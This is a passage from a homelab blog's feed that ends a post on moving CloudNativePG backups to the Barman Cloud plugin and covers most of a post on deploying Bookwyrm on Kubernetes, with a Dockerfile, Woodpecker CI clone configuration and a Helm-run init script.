</span></span><span style="display:flex;"><span>{<span style="color:#f92672">&#34;level&#34;</span>:<span style="color:#e6db74">&#34;info&#34;</span>,<span style="color:#f92672">&#34;ts&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:23.348694147Z&#34;</span>,<span style="color:#f92672">&#34;msg&#34;</span>:<span style="color:#e6db74">&#34;Archived WAL file&#34;</span>,<span style="color:#f92672">&#34;walName&#34;</span>:<span style="color:#e6db74">&#34;/var/lib/postgresql/data/pgdata/pg_wal/0000001A000000020000001A&#34;</span>,<span style="color:#f92672">&#34;startTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:15.059148765Z&#34;</span>,<span style="color:#f92672">&#34;endTime&#34;</span>:<span style="color:#e6db74">&#34;2025-09-07T10:01:23.348614703Z&#34;</span>,<span style="color:#f92672">&#34;elapsedWalTime&#34;</span>:<span style="color:#ae81ff">8.289465957</span>,<span style="color:#f92672">&#34;logging_pod&#34;</span>:<span style="color:#e6db74">&#34;wallabag-pg-cluster-2&#34;</span>}
</span></span></code></pre></div><p>Once that was done, the last step was the ScheduledBackup. There were two changes
to make: replacing <code>method: barmanObjectStore</code> with <code>method: plugin</code> and adding a
<code>pluginConfiguration</code> section:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">plugin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wallabag-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pluginConfiguration</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">barman-cloud.cloudnative-pg.io</span>
</span></span></code></pre></div><p>Then I just waited for a night to pass, to make sure that the base backups also
happened. Those I checked by looking at the <code>base/</code> paths for each cluster in
my CNPG backup bucket, for example <code>s3cmd -c ~/.s3-k8s ls -H &quot;s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/&quot;</code>:</p>
<pre tabindex="0"><code>2025-09-08 01:34  1460   s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/backup.info
2025-09-08 01:34     3G  s3://backup-cnpg/mastodon-pg-cluster/base/20250908T013024/data.tar
</code></pre><p>Yupp, files are there.</p>
<p>And that&rsquo;s it already. Overall, it just took a rather lazy afternoon to do it
all. Sure, I could have wished that it was a bit more automated, but eh. It was
a one-time thing, and the manual changes were not complicated, so I could do it
with at most half my brain engaged.</p>
<p>The one thing I&rsquo;m hoping for is that they might add the Barman Cloud plugin as
an optional component to the CNPG Helm chart, which would make the deployment
for the overall solution a bit easier, while still allowing users to replace
Barman with another backup solution.</p>
]]></content:encoded>
    </item>
    <item>
      <title>Setting up Bookwyrm</title>
      <link>https://blog.mei-home.net/posts/bookwyrm-setup/</link>
      <pubDate>Sun, 31 Aug 2025 23:50:51 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/bookwyrm-setup/</guid>
      <description>Setting up Bookwyrm, translating its docker-compose setup to Kubernetes</description>
      <content:encoded><![CDATA[<p>Wherein I&rsquo;m adding <a href="https://joinbookwyrm.com">Bookwyrm</a> to my Homelab.</p>
<p>I used to read novels. A lot. On school days, I would spend the approximately
twenty minutes between the end of my morning routine and having to head off with
a novel. Ditto for lazy Sunday evenings. During my service as a conscript, I would
always find space for a book in my pack when we went on a training exercise. At
University, the most difficult decision while packing for a trip home would be
judging how many books I would need to pack to ensure I would not run out.</p>
<p>Getting my first Kindle in 2012 was a revolution. Suddenly, I didn&rsquo;t need to
think very hard anymore - I could take my entire library with me. &#x1f389;</p>
<p>But for the last couple of years, my reading has slowly dwindled. So taking a
break from my <a href="https://blog.mei-home.net/tags/series-tinkerbell/">attempts to set up Tinkerbell</a>,
I decided to set up Bookwyrm, the Fediverse alternative to Goodreads.</p>
<p>Which, in hindsight, looks a bit weird: I want to read more novels. So first thing
to do is more homelabbing. &#x1f605;</p>
<h2 id="bookwyrm">Bookwyrm</h2>
<p>So, what does Bookwyrm look like? While I called it the Fediverse Goodreads
alternative, I never actually used Goodreads. So I wasn&rsquo;t sure exactly what I
was getting myself into.</p>
<p>Here is what my home timeline looks like in Bookwyrm:
<figure>
    <img loading="lazy" src="bookwyrm-profile.png"
         alt="A screenshot of my Bookwyrm Home Timeline. At the top is a menu with Lists, Discover and &#39;Your Books&#39; entries, as well as a search field, and on the far right is a profile picture and a dropdown menu with settings. Below on the left is a carousel with my books, first those I&#39;m currently reading, then two books I&#39;ve finished reading and finally a book I&#39;m wanting to read. For each book, its cover is shown. I will go into detail on which books these are in the main post. Below the carousel are some controls for the selected book. It shows the title and a button labeled &#39;Finish reading&#39;, because the selected book is in my &#39;Currently Reading&#39; shelf. Below that are tabs for writing a review of the book, another tab for adding a general comment, and finally one for posting a quote. Below the text box for entering my review is a button for posting, next to a dropdown for choosing post visibility. In the main part of the screen is my timeline, currently filled with my own posts in chronological order. At the top, the most recent post names a book I want to read, including its title, the series it belongs to and its cover. That post has the typical options, namely replying to it, boosting it and liking it. The next one marks a post about me finishing reading a book as having been boosted by my Mastodon account. At the bottom is another carousel, headed &#39;Who to follow&#39; with a couple of proposed accounts, represented by their profile pictures."/> <figcaption>
            <p>My Home Timeline</p>
        </figcaption>
</figure>
</p>
<p>This represents Bookwyrm pretty nicely. The core function of it is socializing
about books, so all interactions revolve around books. I believe there are private
messages which can just be sent to another user, but there is no generic,
Mastodon-like microblogging. All actions are related to a book. In the above
example, you can see two of my posts. The top one represents me marking
<a href="https://bookwyrm.mei-home.net/book/6070/s/the-three-body-problem">The Three-Body Problem</a>
as a book I want to read. The post below it is a boost from my Mastodon account,
where I mark <a href="https://bookwyrm.mei-home.net/book/82/s/false-gods">False Gods</a> as
finished.</p>
<p>On the left of the screenshot is the new post interface, which reinforces what
I wrote above: Bookwyrm is all about books. The new post interface is not just
a text box I can write anything in, but it is instead made up of actions related
to the selected book. For my English-speaking readers, the title of the currently selected book roughly
translates to &ldquo;Fateful Hour of a Democracy&rdquo;; it&rsquo;s a book about the history of the Weimar
Republic. That short period of German history should be emphasized a hell of a lot more
in history lessons than what came before or after it, but sadly isn&rsquo;t.</p>
<p>Back to Bookwyrm, I can write a review of the book, including a 0-5 star score,
a general comment, or a Quote from the book. So all actions I can take relate to
the book itself.</p>
<p>Each book also gets its own page, which looks like this:
<figure>
    <img loading="lazy" src="bookwyrm-book-page.png"
         alt="A screenshot of Bookwyrm&#39;s book page for &#39;On Basilisk Station&#39; by David Weber. Below the title is the name of the series, &#39;Honor Harrington&#39;, and the number 1, indicating that it&#39;s the first book. Both the series and the Author name are highlighted to indicate they are links. On the left side, it shows the book&#39;s cover. In this case, of a woman in a military uniform, with a spaceship firing a laser beam in the background. Below that is the rating, full five stars in this case. Then comes some general information about the book, including page count (422 pages), the language, the publishing date and the ISBN. On the right, the main part of the page starts with a description of the book. At the bottom of it is a link indicating nine more editions of the book being available. Then comes a section headed &#39;You have shelved this edition in&#39;, and it shows the &#39;Read&#39; shelf. Then comes a &#39;Your reading activity&#39; section, showing that I started reading this book on August 1st 2004 and finished on August 24th. Below that, the top of new post section I described in the previous section is visible."/> <figcaption>
            <p>An example of a book page</p>
        </figcaption>
</figure>
</p>
<p>Scrolling further down shows the reviews for the book:
<figure>
    <img loading="lazy" src="bookwyrm-book-page-bottom.png"
         alt="Another Bookwyrm screenshot, this time showing the bottom of the book page. There are multiple tabs, one for &#39;Reviews&#39; and one for &#39;Your reviews&#39;. Both just have a single entry, a review from me about the book and the Honor Harrington series overall. Below the review are buttons for boosting, replying and liking."/> <figcaption>
            <p>Bottom of the book page, with a review</p>
        </figcaption>
</figure>
</p>
<p>What I find a bit sad is that it only shows the related reviews and posts, but the
automatically created post about me starting to read the book is nowhere to
be found.</p>
<p>Another problem is finding the &ldquo;instance&rdquo; of a book. Here is a screenshot of
searching for &ldquo;On Basilisk Station&rdquo; in Bookwyrm:
<figure>
    <img loading="lazy" src="book-search.png"
         alt="A screenshot of Bookwyrm&#39;s book search results for &#39;On Basilisk Station&#39;. It shows a variety of results from different Bookwyrm instances. All of them vary, in Author title, publication date, cover art, and full book title, some containing &#39;Honor Harrington&#39;, the series name, as part of the title."/> <figcaption>
            <p>Bookwyrm book search results</p>
        </figcaption>
</figure>

One of the good things here is that it got the right results; they&rsquo;re all for
the correct book. Something I haven&rsquo;t shown here is that the initial result only
contains the book from my own instance, but the search can then be broadened to
other sources.
Besides Bookwyrm instances, the search also looks at other sites like Inventaire
and OpenLibrary.</p>
<p>On better federated instances than mine, the book page for the same book looks
a bit more lively:
<figure>
    <img loading="lazy" src="federated-book.png"
         alt="Another screenshot of Bookwyrm&#39;s book page for &#39;On Basilisk Station&#39;, but this time from another instance than mine. The cover art and the description of the book are different. But besides my lone review, it shows reviews by multiple other people below the book&#39;s description. In addition, at the bottom of the page, there is a list of a number of other ratings, without full reviews, from a number of users. Each shows the user&#39;s name, profile pic, their rating of the book, and the date they read it."/> <figcaption>
            <p>The page for the same book as before, but now from books.theunseen.city.</p>
        </figcaption>
</figure>

This example comes from <a href="https://books.theunseen.city/book/38651/s/on-basilisk-station">books.theunseen.city</a>.
So with more connections, the book page will fill up on my instance as well.</p>
<p>And that&rsquo;s it for the Bookwyrm tour. I still haven&rsquo;t dived deeply into it, and
I&rsquo;m currently following only one other person. But I already like it as a way
for people to follow what I&rsquo;m reading. Let&rsquo;s see what the future holds.</p>
<h2 id="deploying-bookwyrm-on-kubernetes">Deploying Bookwyrm on Kubernetes</h2>
<p>Let&rsquo;s get on with the technical part. I of course wanted to deploy Bookwyrm in
my Kubernetes cluster. But its <a href="https://docs.joinbookwyrm.com/install-prod.html">default docs</a>
are geared towards deployment with docker-compose. And the instructions contain
some &ldquo;please run this script&hellip;&rdquo; steps which I had to integrate into my setup, to
ensure that I didn&rsquo;t have to rely on documenting the commands somewhere.</p>
<p>But the first step had to be to create a container image, as the Bookwyrm
project itself does not supply one.</p>
<h3 id="image-creation">Image creation</h3>
<p>I took the container build instructions from the <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/Dockerfile">official Dockerfile</a>
and added the image to my CI. In the process, I completely remade my container
image build setup, see <a href="https://blog.mei-home.net/posts/improving-container-image-build-perf-with-buildah/">this post</a>
if you&rsquo;re interested.</p>
<p>The ultimate version of the image build looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-Dockerfile" data-lang="Dockerfile"><span style="display:flex;"><span><span style="color:#66d9ef">ARG</span> python_ver<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">FROM</span><span style="color:#e6db74"> python:${python_ver}</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">ENV</span> PYTHONUNBUFFERED <span style="color:#ae81ff">1</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> mkdir /app /app/static /app/images<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">WORKDIR</span><span style="color:#e6db74"> /app</span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> apt-get update <span style="color:#f92672">&amp;&amp;</span> apt-get install -y gettext libgettextpo-dev tidy libsass-dev <span style="color:#f92672">&amp;&amp;</span> apt-get clean<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">COPY</span> . /app<span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span><span style="color:#66d9ef">RUN</span> env SYSTEM_SASS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;true&#34;</span> pip install -r requirements.txt --no-cache-dir<span style="color:#960050;background-color:#1e0010">
</span></span></span></code></pre></div><p>I made two important changes compared to the official Dockerfile. First, the
official docker-compose deployment just mounts the Bookwyrm source code into
the container to make it available. I wanted the image to be self-contained, so
instead of only copying the <code>requirements.txt</code> file, I copied the entire
source code into the <code>/app</code> directory.</p>
<p>The other change is the addition of <code>libsass-dev</code> to the installed packages and
of the <code>SYSTEM_SASS=&quot;true&quot;</code> variable to the <code>pip</code> invocation installing the
dependencies. I found this to be necessary because of the arm64 image build. For
the amd64 build, a prebuilt wheel is available for the <code>libsass</code> package. But no
wheel seems to be available for arm64, so the C++ libsass gets
built as part of the <code>pip</code> invocation. That takes quite a while on a Pi 4,
especially as the compile only appears to use one core. The builds looked
like this:</p>
<p><figure>
    <img loading="lazy" src="image-build-time.png"
         alt="A screenshot of Woodpecker&#39;s pipeline overview. It shows a Bookwyrm image build, running for a total of 23 minutes. It has two build steps, one for amd64 and one for arm64. The amd64 image took 05:23 minutes, while the arm64 build of the same image took 17:30."/> <figcaption>
            <p>Image build for Bookwyrm without the system libsass.</p>
        </figcaption>
</figure>

The arm64 build took pretty much 3x as long as the amd64 build. Sure, some of that
can be attributed to the arm64 builds running on a Raspberry Pi 4. But the main
contributing factor was that libsass needed to be rebuilt for arm64,
but not for amd64.
After I started using the system libsass, this is what the build times looked
like:
<figure>
    <img loading="lazy" src="image-build-sys-libsass.png"
         alt="Another screenshot of Woodpecker&#39;s pipeline overview. It again shows the Bookwyrm image build, but while the amd64 build still takes a comparable 5:40 minutes, the arm64 build now only takes 10:38 minutes. Still a lot longer, but no longer quite as bad."/> <figcaption>
            <p>Some improvements of the image build times after I started using the system libsass instead of letting pip build it.</p>
        </figcaption>
</figure>

Good enough for now.</p>
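<p>As an aside, whether a prebuilt wheel exists for a given platform can be checked
ahead of time with <code>pip download</code>. A quick sketch; the platform tag and Python
version here are just examples, not what my CI runs:</p>
<pre tabindex="0"><code>pip download libsass --no-deps --only-binary=:all: \
    --platform manylinux2014_aarch64 --python-version 3.11 \
    -d /tmp/wheel-check
# succeeds only if a prebuilt wheel is available for that platform;
# errors out if pip would have to build from source instead
</code></pre>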
<p>But there was one issue remaining: As you can see, I&rsquo;m copying the Bookwyrm code
into the image. But I had to get that code from somewhere first, and I wanted
to have it in my Homelab, instead of fetching it from GitHub every time. So
I created a mirror on my Forgejo instance. That brought up a new question: how do I
fetch that repo from Forgejo within a Woodpecker job? I could certainly have
made it a public repo and just fetched it, but I figured I would try to do it
properly and fetch it with credentials.</p>
<p>But where to get the credentials from? I didn&rsquo;t want to manually add them to the
repo config in Woodpecker, because I figured that Woodpecker already had suitable
credentials anyway: it has to fetch the container image repo where I keep the
Containerfile for the Bookwyrm image. Reading up a bit, I found the
<a href="https://woodpecker-ci.org/docs/usage/environment#built-in-environment-variables">environment variable docs for Woodpecker</a>.
These contain the <code>CI_NETRC_USERNAME</code> and <code>CI_NETRC_PASSWORD</code> variables. These
are set to the credentials needed to fetch from the git forge configured for
the repository in Woodpecker. Note that the docs say this:</p>
<blockquote>
<p>Credentials for private repos to be able to clone data. (Only available for specific images)</p></blockquote>
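<p>For context, what git ultimately consumes here is, as far as I understand it, an
ordinary netrc file written into the step&rsquo;s container. Its general shape is just
this (host and values purely hypothetical):</p>
<pre tabindex="0"><code>machine forgejo.example.com
login woodpecker
password some-access-token
</code></pre>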
<p>Sadly, it doesn&rsquo;t say which images get a netrc file with the credentials mounted.
I found more docs <a href="https://woodpecker-ci.org/docs/usage/project-settings#custom-trusted-clone-plugins">here</a>,
mentioning trusted clone plugins. I tried to build a small Alpine image with
git installed, but still didn&rsquo;t manage to get the credentials into that image.
The error message always read:</p>
<pre tabindex="0"><code>fatal: could not read Username for &#39;https://forgejo.example.com&#39;: No such device or address
</code></pre><p>I then dug through the code and tried to find the check, to see what was wrong
with my new Alpine image and why it didn&rsquo;t get the netrc credentials. I found
<a href="https://github.com/woodpecker-ci/woodpecker/blob/e8beddeb36e5e14bd836d5084dbd49ef10a8a768/pipeline/frontend/yaml/types/container.go#L130">this function</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-go" data-lang="go"><span style="display:flex;"><span><span style="color:#66d9ef">func</span> (<span style="color:#a6e22e">c</span> <span style="color:#f92672">*</span><span style="color:#a6e22e">Container</span>) <span style="color:#a6e22e">IsTrustedCloneImage</span>(<span style="color:#a6e22e">trustedClonePlugins</span> []<span style="color:#66d9ef">string</span>) <span style="color:#66d9ef">bool</span> {
</span></span><span style="display:flex;"><span>	<span style="color:#66d9ef">return</span> <span style="color:#a6e22e">c</span>.<span style="color:#a6e22e">IsPlugin</span>() <span style="color:#f92672">&amp;&amp;</span> <span style="color:#a6e22e">utils</span>.<span style="color:#a6e22e">MatchImageDynamic</span>(<span style="color:#a6e22e">c</span>.<span style="color:#a6e22e">Image</span>, <span style="color:#a6e22e">trustedClonePlugins</span><span style="color:#f92672">...</span>)
</span></span><span style="display:flex;"><span>}
</span></span></code></pre></div><p>Note that it doesn&rsquo;t just check the image, but also verifies that the step is
a plugin, not just an image executing commands. Instead of building a plugin,
I decided to try to work with the official clone plugin, which is also used to
clone the initial repository for a Woodpecker pipeline run. This ultimately
worked, and the step for fetching the Bookwyrm repo mirror from my Forgejo
looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">clone bookwyrm repo</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">woodpeckerci/plugin-git</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">settings</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">depth</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">tags</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">branch</span>: <span style="color:#ae81ff">production</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">partial</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">remote</span>: <span style="color:#ae81ff">https://forgejo.example.com/mirrors/bookwyrm.git</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">ref</span>: <span style="color:#e6db74">&#39;v0.7.5&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/woodpecker/bookwyrm</span>
</span></span></code></pre></div><p>Note that the <code>/mirrors/</code> part of the URL is not required for the repo to work as a mirror;
I just put my Forgejo mirrors into a group called <code>mirrors</code>.</p>
<p>And with this, I ended up with the Bookwyrm repo, checked out at the tag <code>v0.7.5</code>
and available under <code>/woodpecker/bookwyrm</code> for the rest of the pipeline steps.</p>
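<p>The subsequent steps then work directly on that checkout. Just to illustrate the
idea (this step is not part of my actual pipeline), a trivial follow-up step that
verifies the checked-out tag could look like this:</p>
<pre tabindex="0"><code>  - name: show bookwyrm version
    image: alpine/git
    commands:
      - cd /woodpecker/bookwyrm
      - git describe --tags
</code></pre>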
<p>Getting to the point of having the Bookwyrm image was quite a ride, but now it&rsquo;s
time for the actual Kubernetes deployment.</p>
<h3 id="kubernetes-deployment">Kubernetes deployment</h3>
<p>When it comes to dependencies, Bookwyrm requires a Postgres DB and Redis, plus
it supports an S3 bucket for media and other static assets. I will not go into
detail on those dependencies. If you&rsquo;re curious about how I&rsquo;m setting them
up in my Homelab, here are the two relevant posts:</p>
<ul>
<li><a href="https://blog.mei-home.net/posts/k8s-migration-8-cloud-native-pg/">CloudNativePG Postgres DB setup</a></li>
<li><a href="https://blog.mei-home.net/posts/k8s-migration-5-s3-buckets/">Ceph S3 setup</a></li>
</ul>
<p>Looking at Bookwyrm&rsquo;s <a href="https://docs.joinbookwyrm.com/install-prod.html">setup docs</a>,
I found that they require executing a script during the initial deployment.</p>
<blockquote>
<p>Initialize the database by running ./bw-dev migrate</p></blockquote>
<p>And:</p>
<blockquote>
<p>Initialize the application with ./bw-dev setup, and copy the admin code to use when you create your admin account.</p></blockquote>
<p>So I needed to somehow integrate that into my setup. A look at the <a href="https://github.com/bookwyrm-social/bookwyrm/blob/v0.7.5/bw-dev">bw-dev script</a>
made it pretty clear that Bookwyrm is really geared towards a docker-compose
deployment. The script is intended to be run outside of the Bookwyrm container,
as indicated by the fact that it calls docker-compose for everything it does:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> runweb <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    $DOCKER_COMPOSE run --rm web <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">[</span>...<span style="color:#f92672">]</span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> initdb <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py initdb <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> migrate <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py migrate <span style="color:#e6db74">&#34;</span>$@<span style="color:#e6db74">&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">function</span> admin_code <span style="color:#f92672">{</span>
</span></span><span style="display:flex;"><span>    runweb python manage.py admin_code
</span></span><span style="display:flex;"><span><span style="color:#f92672">}</span>
</span></span></code></pre></div><p>This of course won&rsquo;t work in a Kubernetes deployment. To work around this, I
wrote my own script, using the <code>manage.py</code> commands directly, without calling
the <code>bw-dev</code> script. It ended up looking like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">bookwyrm-script</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bookwyrm.sh</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    #! /bin/bash
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    migrate() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py migrate &#34;$@&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    initdb() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py initdb &#34;$@&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    init() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Running init function...&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate &#34;django_celery_beat&#34; || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      initdb || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py compile_themes || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py collectstatic --no-input || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py admin_code || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      return 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    update() {
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Running update function...&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      migrate || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py compile_themes || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      python manage.py collectstatic --no-input || return 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      return 0
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    }
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    op=&#34;${1}&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    if [[ &#34;${op}&#34; == &#34;init&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      init || exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    elif [[ &#34;${op}&#34; == &#34;update&#34; ]]; then
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      update || exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    else
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      echo &#34;Unknown operation ${op}, aborting.&#34;
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      exit 1
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    fi
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">    exit 0</span>
</span></span></code></pre></div><p>This script supports two operations: the initialization during the first deployment,
run with <code>bookwyrm.sh init</code>, and the migrations that may be required during updates,
run with <code>bookwyrm.sh update</code>.</p>
<p>Next question: how to run the script? For that, I looked into <a href="https://helm.sh/docs/topics/charts_hooks/">Helm chart hooks</a>.
These are annotations put on a template in a Helm chart, which make Helm instantiate
the template only at certain points. There are hooks available for all
phases of the Helm release lifecycle, from install through upgrade to delete.</p>
<p>I sadly couldn&rsquo;t make use of the <code>post-install</code> hook for the <code>init</code> part of the
Bookwyrm script, because the chart also contains the CloudNativePG and S3 bucket
templates, and I had already installed that part of the chart.
So for the init step, I opted for a simple workaround. The Job&rsquo;s
manifest looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>{{- <span style="color:#ae81ff">if .Values.runInit }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">batch/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Job</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
